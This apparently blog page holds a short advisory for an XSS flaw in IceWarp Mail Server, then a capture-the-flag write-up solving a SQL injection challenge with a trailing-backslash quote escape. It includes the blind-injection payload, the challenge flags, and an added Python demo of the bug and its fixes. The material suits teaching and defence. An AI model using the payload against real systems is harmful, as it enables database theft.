CVE-2018-7475

Posted on February 25, 2018
============================================
CVE: CVE-2018-7475
============================================
Credit: 0xd0ff9
============================================
Dates: February 25, 2018
============================================
Vendor: https://www.icewarp.com/
============================================
Product: IceWarp Mail Server
============================================
Versions Affected: 12.0.3
============================================
Risk / Severity Rating: Low
============================================
Vulnerability Description and Impact:
Description: Cross-site scripting (XSS) vulnerability in webdav/ticket/ URIs in IceWarp Mail Server.
Impact: context-dependent; for example, forcing the victim to change account properties, or turning the page into an open redirect to a malicious site.
For more information: https://www.youtube.com/watch?v=8_3Q80JrMm4&feature=youtu.be
============================================
Solution: Don't echo user input back into the response unmodified; encode or sanitize it first.
============================================

Viettel matesctf round 5 (CoinMining)

When I started this challenge, my first guesses were SSRF, exploiting a bot, JavaScript, something to do with cryptocurrency, and so on.
But the solution was SQL injection.
First, guessing how it works: I guessed it uses an action parameter to call a function. In the JavaScript file, I found a getDomain() function.

Second, guessing the arguments: I guessed that this getDomain function has one argument, and that it is coin.

I think I guessed well.
After that, I guessed the query looked like:

select * from [table_name] where domainName="$_POST['domainName']" and coin="$_POST['coin']"

I guessed that the characters ' and " are filtered or replaced, and that the character \ is neither replaced nor filtered.
So I guessed my solution could use the character \ to turn the closing ' into \' and escape the query.

I used this payload to exploit it:

action=doCheck&domainName=smallbox.ir\&coin=or if(substr((select anything from tablewhatyouwant limit 1),§1§,1)=0x§4c§,1,0)-- -
 

and got the flag in the flag table: matesctf: matesctf: fl4g_NT_h3r3_
but I guessed it was not the real flag.

The real flag is in the bingo table: matesctf{sql_f!l73r_i$_n0&_s@’f’_’3’n0ugh!}
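As an added example (not part of the original write-up or the challenge's code), the Python script below reproduces the guessed bug end to end: a filter that strips ' and " but leaves \ alone, a query built by string concatenation, and a small MySQL-style scanner that shows which bytes end up inside string literals and which the server parses as SQL. With a trailing backslash in domainName, the closing quote is escaped, the literal runs on to the opening quote of coin, and the coin value becomes live SQL; the same scanner shows that backslash-aware escaping closes the hole, and a parameterized lookup treats the attack strings as plain data. The table name domains, its columns, the filter, the sample row and the filled-in Burp markers (position 1, byte 0x4c) are assumptions.

```python
"""Added example for the CoinMining write-up (not the challenge's own code).

Reproduces the guessed bug: quotes are stripped from the input but the
backslash is not, so a trailing backslash in domainName escapes the closing
quote and the coin parameter lands outside any string literal. The table
name `domains`, its columns, the filter and the sample row are assumptions.
"""

import sqlite3

# Payload shape from the write-up with the Burp markers filled in with
# position 1 and byte 0x4c ('L'); table/column names are placeholders.
ATTACK_DOMAIN = "smallbox.ir\\"
ATTACK_COIN = "or if(substr((select flag from flag limit 1),1,1)=0x4c,1,0)-- -"


def strip_quotes(value):
    """The filter the write-up guesses: removes ' and " but keeps backslash."""
    return value.replace("'", "").replace('"', "")


def mysql_escape(value):
    """Backslash escaping in the style of mysql_real_escape_string. The
    backslash itself must be doubled first, otherwise the trailing-backslash
    trick still works against the fix."""
    return (value.replace("\\", "\\\\")
                 .replace('"', '\\"')
                 .replace("'", "\\'"))


def build_query(domain, coin, sanitize=strip_quotes):
    """Hypothetical concatenated query, as guessed in the write-up."""
    return 'select * from domains where domainName="%s" and coin="%s"' % (
        sanitize(domain), sanitize(coin))


def split_sql(query):
    """Split a MySQL-style statement into its double-quoted string literals
    and the text outside them (the part the server parses as syntax).

    Inside a literal a backslash escapes the next character (MySQL default,
    i.e. sql_mode without NO_BACKSLASH_ESCAPES), so \\" does not end it.
    A '-- ' or '#' outside a literal starts a comment that runs to the end.
    Returns (literals, outside_sql) with whitespace in outside_sql collapsed.
    """
    literals, outside = [], []
    i, n = 0, len(query)
    while i < n:
        c = query[i]
        if c == '"':
            j, buf = i + 1, []
            while j < n and query[j] != '"':
                if query[j] == "\\" and j + 1 < n:
                    buf.append(query[j + 1])  # escaped char, including \"
                    j += 2
                else:
                    buf.append(query[j])
                    j += 1
            literals.append("".join(buf))
            i = j + 1
        elif query.startswith("-- ", i) or c == "#":
            break  # rest of the statement is a comment
        else:
            outside.append(c)
            i += 1
    return literals, " ".join("".join(outside).split())


def lookup_parameterized(domain, coin):
    """The same lookup with bound parameters on an in-memory SQLite table
    (constructed sample data): the attack strings are compared as data,
    so they match nothing. Returns the matching row count."""
    con = sqlite3.connect(":memory:")
    con.execute("create table domains (domainName text, coin text)")
    con.execute("insert into domains values ('smallbox.ir', 'btc')")
    count = con.execute(
        "select count(*) from domains where domainName=? and coin=?",
        (domain, coin)).fetchone()[0]
    con.close()
    return count


if __name__ == "__main__":
    for label, q in [("benign", build_query("smallbox.ir", "btc")),
                     ("attack", build_query(ATTACK_DOMAIN, ATTACK_COIN)),
                     ("escaped", build_query(ATTACK_DOMAIN, ATTACK_COIN,
                                             sanitize=mysql_escape))]:
        lits, sql = split_sql(q)
        print(label, "| literals:", lits, "| parsed as SQL:", sql)
    print("parameterized, attack input matches",
          lookup_parameterized(ATTACK_DOMAIN, ATTACK_COIN), "rows")
```

In the attack case the first literal comes out as smallbox.ir" and coin= and the whole if(substr(...)) expression sits outside any literal, which is exactly why the boolean-blind probe works; the -- - at the end comments out the quote the template would otherwise leave dangling. Stripping quotes is not enough because the escape character is what actually decides where a literal ends; bound parameters sidestep the problem entirely.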